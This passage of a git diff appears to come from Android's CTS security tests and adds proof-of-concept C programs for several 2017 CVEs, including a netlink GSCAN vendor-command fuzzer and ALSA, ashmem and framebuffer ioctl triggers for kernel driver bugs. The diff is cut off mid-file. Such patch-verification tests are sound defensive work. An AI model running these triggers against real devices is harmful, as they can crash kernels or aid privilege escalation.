+ GSCAN_ATTRIBUTE_BSSID_BLACKLIST_FLUSH = 100,
+ GSCAN_ATTRIBUTE_BLACKLIST_BSSID,
+ GSCAN_ATTRIBUTE_ANQPO_HS_LIST = 110,
+ GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE,
+ GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID,
+ GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM,
+ GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID,
+ GSCAN_ATTRIBUTE_ANQPO_HS_PLMN,
+ /* Adaptive scan attributes */
+ GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT = 120,
+ GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD,
+ GSCAN_ATTRIBUTE_MAX
+};
+
+
+#define ETHER_ADDR_LEN 6
+struct __attribute__ ((packed)) _ether_addr {
+ uint8_t octet[ETHER_ADDR_LEN];
+};
+
+static int l1;
+static int l2;
+static void test(struct nl_sock *socket, int d_id, int if_index)
+{
+ struct nl_msg *msg;
+ struct nl_cb *cb;
+ struct nl_msg *vendor_cmd, *nested_msg;
+ struct nlattr *nl_vendor_cmds, *nested, *nested2, *nested3;
+ int err, i, j = 0, k = 0, ret;
+ struct _ether_addr mac;
+ memset(&mac, 0x41, sizeof(mac));
+
+ // Allocate the messages and callback handler.
+ for (j = l1; j < 1024; j++) {
+ for(k = l2; k < 128; k++) {
+ msg = nlmsg_alloc_size(16384);
+ if (!msg) {
+ exit(EXIT_FAILURE);
+ }
+
+ genlmsg_put(msg, 0, 0, d_id, 0, 0, NL80211_CMD_VENDOR, 0);
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put_u32(msg, NL80211_ATTR_WIPHY, 0);
+ nla_put_u64(msg, NL80211_ATTR_WDEV, 1);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG);
+
+ /* construct the vendor cmd */
+ nl_vendor_cmds = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ nested = nla_nest_start(msg, GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS);
+ for (i = 0; i < j; i++) {
+ nested2 = nla_nest_start(msg, i);
+ nla_nest_end(msg, nested2);
+ }
+ for (i = 0; i < k; i++) {
+ nested2 = nla_nest_start(msg, i);
+ nla_put(msg, GSCAN_ATTRIBUTE_BSSID, sizeof(mac), &mac);
+ nla_put_u8(msg, GSCAN_ATTRIBUTE_RSSI_LOW, 0x41);
+ nla_put_u8(msg, GSCAN_ATTRIBUTE_RSSI_HIGH, 0x41);
+ nla_nest_end(msg, nested2);
+ }
+ nla_nest_end(msg, nested);
+ nla_nest_end(msg, nl_vendor_cmds);
+
+ nl_send_auto_complete(socket, msg);
+ nlmsg_free(msg);
+ }
+ }
+}
+
+int main(int argc, char **argv)
+{
+ int if_index = if_nametoindex("wlan0"); // Use this wireless interface for scanning.
+ l1 = 157;
+ l2 = 0;
+ // Open socket to kernel.
+ struct nl_sock *socket = nl_socket_alloc(); // Allocate new netlink socket in memory.
+ genl_connect(socket); // Create file descriptor and bind socket.
+ int driver_id = genl_ctrl_resolve(socket, "nl80211"); // Find the nl80211 driver ID.
+
+ test(socket, driver_id, if_index);
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk
new file mode 100644
index 0000000..9d1d3d17
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-7369/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-7369
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SRC_FILES := poc.c
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c b/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c
new file mode 100644
index 0000000..c18936c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-7369/poc.c
@@ -0,0 +1,236 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/ptrace.h>
+#include <errno.h>
+#include <sys/syscall.h>
+#include <sys/prctl.h>
+#include <stdint.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <linux/fb.h>
+#include <dlfcn.h>
+#include <sys/socket.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <unistd.h>
+#include <sound/asound.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define MAXNUM 94
+#define MAXPCMOP 25
+#define MAXELE 16384
+
+char* CONTBL[MAXNUM]={
+ "comprC0D17",
+ "comprC0D18",
+ "comprC0D37",
+ "comprC0D38",
+ "comprC0D39",
+ "comprC0D40",
+ "comprC0D41",
+ "comprC0D42",
+ "comprC0D9",
+ "controlC0",
+ "hwC0D10",
+ "hwC0D1000",
+ "hwC0D11",
+ "hwC0D12",
+ "hwC0D13",
+ "hwC0D14",
+ "hwC0D15",
+ "hwC0D16",
+ "hwC0D2",
+ "hwC0D20",
+ "hwC0D21",
+ "hwC0D22",
+ "hwC0D24",
+ "hwC0D25",
+ "hwC0D26",
+ "hwC0D3",
+ "hwC0D30",
+ "hwC0D31",
+ "hwC0D35",
+ "hwC0D36",
+ "hwC0D37",
+ "hwC0D39",
+ "hwC0D40",
+ "hwC0D45",
+ "hwC0D7",
+ "hwC0D8",
+ "hwC0D9",
+ "pcmC0D0c",
+ "pcmC0D0p",
+ "pcmC0D10c",
+ "pcmC0D10p",
+ "pcmC0D11c",
+ "pcmC0D11p",
+ "pcmC0D12c",
+ "pcmC0D12p",
+ "pcmC0D13c",
+ "pcmC0D13p",
+ "pcmC0D14c",
+ "pcmC0D14p",
+ "pcmC0D15c",
+ "pcmC0D15p",
+ "pcmC0D16c",
+ "pcmC0D19c",
+ "pcmC0D19p",
+ "pcmC0D1c",
+ "pcmC0D1p",
+ "pcmC0D20c",
+ "pcmC0D20p",
+ "pcmC0D21p",
+ "pcmC0D22c",
+ "pcmC0D22p",
+ "pcmC0D23c",
+ "pcmC0D23p",
+ "pcmC0D24c",
+ "pcmC0D24p",
+ "pcmC0D25c",
+ "pcmC0D26p",
+ "pcmC0D27c",
+ "pcmC0D28c",
+ "pcmC0D29c",
+ "pcmC0D2c",
+ "pcmC0D2p",
+ "pcmC0D30c",
+ "pcmC0D31c",
+ "pcmC0D32c",
+ "pcmC0D33c",
+ "pcmC0D34c",
+ "pcmC0D35c",
+ "pcmC0D35p",
+ "pcmC0D36c",
+ "pcmC0D36p",
+ "pcmC0D3c",
+ "pcmC0D3p",
+ "pcmC0D43c",
+ "pcmC0D44c",
+ "pcmC0D44p",
+ "pcmC0D45c",
+ "pcmC0D45p",
+ "pcmC0D4p",
+ "pcmC0D5c",
+ "pcmC0D5p",
+ "pcmC0D6c",
+ "pcmC0D7p",
+ "pcmC0D8c"
+};
+
+ char* OPPCM[MAXPCMOP]={
+ "/dev/snd/pcmC0D0p",
+ "/dev/snd/pcmC0D10p",
+ "/dev/snd/pcmC0D11p",
+ "/dev/snd/pcmC0D12p",
+ "/dev/snd/pcmC0D13p",
+ "/dev/snd/pcmC0D14p",
+ "/dev/snd/pcmC0D15p",
+ "/dev/snd/pcmC0D19p",
+ "/dev/snd/pcmC0D1p",
+ "/dev/snd/pcmC0D20p",
+ "/dev/snd/pcmC0D21p",
+ "/dev/snd/pcmC0D22p",
+ "/dev/snd/pcmC0D23p",
+ "/dev/snd/pcmC0D24p",
+ "/dev/snd/pcmC0D2p",
+ "/dev/snd/pcmC0D32p",
+ "/dev/snd/pcmC0D33p",
+ "/dev/snd/pcmC0D3p",
+ "/dev/snd/pcmC0D40p",
+ "/dev/snd/pcmC0D41p",
+ "/dev/snd/pcmC0D44p",
+ "/dev/snd/pcmC0D47p",
+ "/dev/snd/pcmC0D4p",
+ "/dev/snd/pcmC0D5p",
+ "/dev/snd/pcmC0D7p"
+};
+
+void poc(char* name)
+{
+ int fd, ret, cmd, index,pcmfd, i;
+ char dev[36]={0};
+ snprintf(dev, sizeof(dev),"/dev/snd/%s", name);
+ fd = open(dev, O_RDWR);
+ if (fd < 0)
+ {
+ return;
+ }
+
+ cmd = SNDRV_CTL_IOCTL_CARD_INFO;
+ struct snd_ctl_card_info info;
+ ret = ioctl(fd, cmd, &info);
+
+ struct snd_ctl_elem_list lst;
+ struct snd_ctl_elem_value control;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(MAXELE, sizeof(struct snd_ctl_elem_list));
+ lst.space = MAXELE;
+ cmd = SNDRV_CTL_IOCTL_ELEM_LIST;
+ ret = ioctl(fd, cmd, &lst);
+ control.value.integer.value[0]=control.value.enumerated.item[0] = 0x80001111;
+
+ for(index=0;(unsigned int)index<lst.count;index++)
+ {
+ if(!strncmp((const char *)lst.pids[index].name,"SLIM_1_TX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_0_TX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_6_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_5_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"SLIM_0_RX Channels",18)||
+ !strncmp((const char *)lst.pids[index].name,"Playback 24 Volume",18)||
+ !strncmp((const char *)lst.pids[index].name,"left Profile",12)||
+ !strncmp((const char *)lst.pids[index].name,"Playback Device Channel Map",27)||
+ !strncmp((const char *)lst.pids[index].name, "LSM",3)||
+ !strncmp((const char *)lst.pids[index].name,"MAD Input",9)||
+ !strncmp((const char *)lst.pids[index].name, "AUDIO_REF_EC_UL",15)||
+ !strncmp((const char *)lst.pids[index].name, "VOC_EXT_EC",10)) continue;
+
+ control.id.numid=lst.pids[index].numid;
+ ret = ioctl(fd,SNDRV_CTL_IOCTL_ELEM_WRITE,&control);
+ }
+ close(fd);
+}
+
+struct mystruct{
+ int a;
+ char* pp;
+};
+
+void freeptr(struct mystruct* p)
+{
+ unsigned char* n = (unsigned char *)p->pp;
+ n = NULL;
+ p->pp = NULL;
+ p = NULL;
+}
+
+int main()
+{
+ int i =0;
+ for(i = 0; i< MAXNUM; i++)
+ {
+ poc("controlC0");
+ break;
+ }
+ return 1;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
new file mode 100644
index 0000000..0d1d60b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-8263
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
new file mode 100644
index 0000000..a75782b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
@@ -0,0 +1,50 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _LINUX_ASHMEM_H
+#define _LINUX_ASHMEM_H
+#include <linux/limits.h>
+#include <linux/ioctl.h>
+#define ASHMEM_NAME_LEN 256
+#define ASHMEM_NAME_DEF "dev/ashmem"
+ /* Return values from ASHMEM_PIN: Was the mapping purged while unpinned? */
+#define ASHMEM_NOT_PURGED 0
+#define ASHMEM_WAS_PURGED 1
+ /* Return values from ASHMEM_GET_PIN_STATUS: Is the mapping pinned? */
+#define ASHMEM_IS_UNPINNED 0
+#define ASHMEM_IS_PINNED 1
+struct ashmem_pin {
+ __u32 offset; /* offset into region, in bytes, page-aligned */
+ __u32 len; /* length forward from offset, in bytes, page-aligned */
+};
+#define __ASHMEMIOC 0x77
+#define ASHMEM_SET_NAME _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
+#define ASHMEM_GET_NAME _IOR(__ASHMEMIOC, 2, char[ASHMEM_NAME_LEN])
+#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_GET_SIZE _IO(__ASHMEMIOC, 4)
+#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
+#define ASHMEM_GET_PROT_MASK _IO(__ASHMEMIOC, 6)
+#define ASHMEM_PIN _IOW(__ASHMEMIOC, 7, struct ashmem_pin)
+#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
+#define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
+#define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
+#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11)
+#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12)
+#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13)
+int get_ashmem_file(int fd, struct file **filp, struct file **vm_file,
+ unsigned long *len);
+void put_ashmem_file(struct file *file);
+#endif /* _LINUX_ASHMEM_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
new file mode 100644
index 0000000..687bbc5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
@@ -0,0 +1,51 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <stdio.h>
+#include "local_poc.h"
+
+
+int main() {
+ int fd;
+ int ret;
+ uint64_t mmap_ret;
+
+ fd = open("/dev/ashmem", 0, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ret = ioctl(fd, ASHMEM_SET_SIZE, 0x1000);
+ if (ret < 0) {
+ return -1;
+ }
+
+ mmap_ret = (uint64_t) mmap((void *) 0x7f0000000 /*addr*/, 0x1000 /*length*/, 0x0 /*prot*/,
+ 0x12 /*flags=MAP_FIXED|MAP_PRIVATE*/, fd, 0x0 /*offset*/);
+ if (mmap_ret == MAP_FAILED) {
+ return -1;
+ }
+
+ ret = ioctl(fd, ASHMEM_CACHE_FLUSH_RANGE, NULL);
+ if (ret < 0) {
+ return -1;
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9678/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-9678/Android.mk
new file mode 100644
index 0000000..0a5b344
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9678/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-9678
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9678/poc.c b/hostsidetests/security/securityPatch/CVE-2017-9678/poc.c
new file mode 100644
index 0000000..beb7cc8
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9678/poc.c
@@ -0,0 +1,131 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define GNU_SOURCE
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <string.h>
+
+#ifndef _IOC_NONE
+#define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+#define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+#define _IOC_READ 2U
+#endif
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+#define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+#define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS) - 1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS) - 1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS) - 1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS) - 1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT + _IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT + _IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT + _IOC_SIZEBITS)
+
+#define _IOC(dir, type, nr, size) \
+ (((dir) << _IOC_DIRSHIFT) | ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | ((size) << _IOC_SIZESHIFT))
+
+#ifndef __KERNEL__
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#endif
+
+#define _IO(type, nr) _IOC(_IOC_NONE, (type), (nr), 0)
+#define _IOR(type, nr, size) \
+ _IOC(_IOC_READ, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOW(type, nr, size) \
+ _IOC(_IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOWR(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOR_BAD(type, nr, size) _IOC(_IOC_READ, (type), (nr), sizeof(size))
+#define _IOW_BAD(type, nr, size) _IOC(_IOC_WRITE, (type), (nr), sizeof(size))
+#define _IOWR_BAD(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), sizeof(size))
+
+#define MDP_IOCTL_MAGIC 'S'
+/* atomic commit ioctl used for validate and commit request */
+#define MSMFB_ATOMIC_COMMIT _IOWR(MDP_IOCTL_MAGIC, 128, void *)
+
+struct mdp_rect {
+ uint32_t x;
+ uint32_t y;
+ uint32_t w;
+ uint32_t h;
+};
+
+typedef unsigned int u32;
+
+typedef u32 compat_caddr_t;
+
+struct mdp_layer_commit_v1_32 {
+ uint32_t flags;
+ int release_fence;
+ struct mdp_rect left_roi;
+ struct mdp_rect right_roi;
+ compat_caddr_t input_layers;
+ uint32_t input_layer_cnt;
+ compat_caddr_t output_layer;
+ int retire_fence;
+ uint32_t reserved[6];
+};
+
+struct mdp_layer_commit32 {
+ uint32_t version;
+ union {
+ struct mdp_layer_commit_v1_32 commit_v1;
+ };
+};
+
+int main() {
+ int fd;
+ int ret;
+ struct mdp_layer_commit32 mlc;
+
+ memset(&mlc, 0, sizeof(struct mdp_layer_commit32));
+
+ fd = open("/dev/graphics/fb0", O_RDWR);
+
+ if (fd < 0) {
+ return -1;
+ }
+
+ ret = ioctl(fd, MSMFB_ATOMIC_COMMIT, &mlc);
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk
new file mode 100644
index 0000000..fa5539b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-9692
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c b/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c
new file mode 100644
index 0000000..7b4de81
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c
@@ -0,0 +1,209 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/types.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#ifndef _IOC_NONE
+#define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+#define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+#define _IOC_READ 2U
+#endif
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+#define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+#define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS) - 1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS) - 1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS) - 1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS) - 1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT + _IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT + _IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT + _IOC_SIZEBITS)
+
+#define _IOC(dir, type, nr, size) \
+ (((dir) << _IOC_DIRSHIFT) | ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | ((size) << _IOC_SIZESHIFT))
+
+#ifndef __KERNEL__
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#endif
+
+#define _IO(type, nr) _IOC(_IOC_NONE, (type), (nr), 0)
+#define _IOR(type, nr, size) \
+ _IOC(_IOC_READ, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOW(type, nr, size) \
+ _IOC(_IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOWR(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOR_BAD(type, nr, size) _IOC(_IOC_READ, (type), (nr), sizeof(size))
+#define _IOW_BAD(type, nr, size) _IOC(_IOC_WRITE, (type), (nr), sizeof(size))
+#define _IOWR_BAD(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), sizeof(size))
+
+#define MDP_IOCTL_MAGIC 'S'
